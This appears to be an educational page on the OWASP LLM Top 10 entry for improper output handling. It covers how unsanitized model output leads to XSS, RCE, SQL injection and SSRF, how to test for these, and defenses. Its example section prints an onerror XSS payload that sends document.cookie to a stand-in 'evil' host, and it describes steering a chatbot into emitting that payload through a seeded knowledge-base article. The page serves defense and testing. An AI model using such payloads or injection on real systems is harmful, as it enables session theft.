the attack surfaceLLM05:2025

Improper Output Handling

OWASP Top 10 for LLM Applications · 2025

OWASP LLM05: Improper Output Handling — OWASP GenAI ↗

Improper Output Handling is insufficient validation, sanitization, and handling of LLM-generated output before it is passed downstream to other components — turning the model into an unfiltered conduit for classic appsec payloads.

How it's exploited

The model is upstream of a sink that trusts it. Whatever text the LLM emits flows, unsanitized, straight into a browser, shell, database, or HTTP client — so a crafted (or prompt-injected) response carries an executable payload into a context that interprets it:

XSS — model-authored HTML/Markdown/JavaScript rendered verbatim in a browser.
RCE — output handed to a system shell, eval(), or a code interpreter.
SQL injection — generated queries executed without parameterization.
SSRF / CSRF — attacker-controlled URLs or forged requests embedded in the reply.
Path traversal & privilege escalation — unsanitized file paths and over-broad backend permissions exercised via the output.

What it looks like

A support chatbot renders model replies as Markdown. An attacker seeds a knowledge-base article (or sends a message) that steers the model into returning <img src=x onerror=fetch('//evil/'+document.cookie)>. The frontend renders it raw → stored XSS firing in every agent's session. Same root cause, different sinks: "delete all tables" echoed into an unparameterized query, or a hallucinated package name that ships malware into a build.

How to test for it

Treat the model as an injection oracle and drive standard appsec payloads through it. Prompt it to emit <script> / onerror= handlers and watch whether the UI executes them; coax SQL meta-characters or stacked queries into any DB-bound output; request URLs and file paths to probe SSRF and traversal sinks; chain with prompt injection (LLM01) so the trigger comes from data, not the user. The bug is in the sink — confirm the rendered/executed result, not just the model text.

Defenses

Adopt a zero-trust posture toward model output: validate and sanitize it exactly as you would untrusted user input.

Context-aware output encoding at every sink — HTML, JS, SQL, URL, shell.
Parameterized queries / prepared statements for all DB access.
Content Security Policy to blunt XSS; follow OWASP ASVS input-handling guidance.
Least privilege on backends the model can reach, plus logging and anomaly detection on output-driven actions.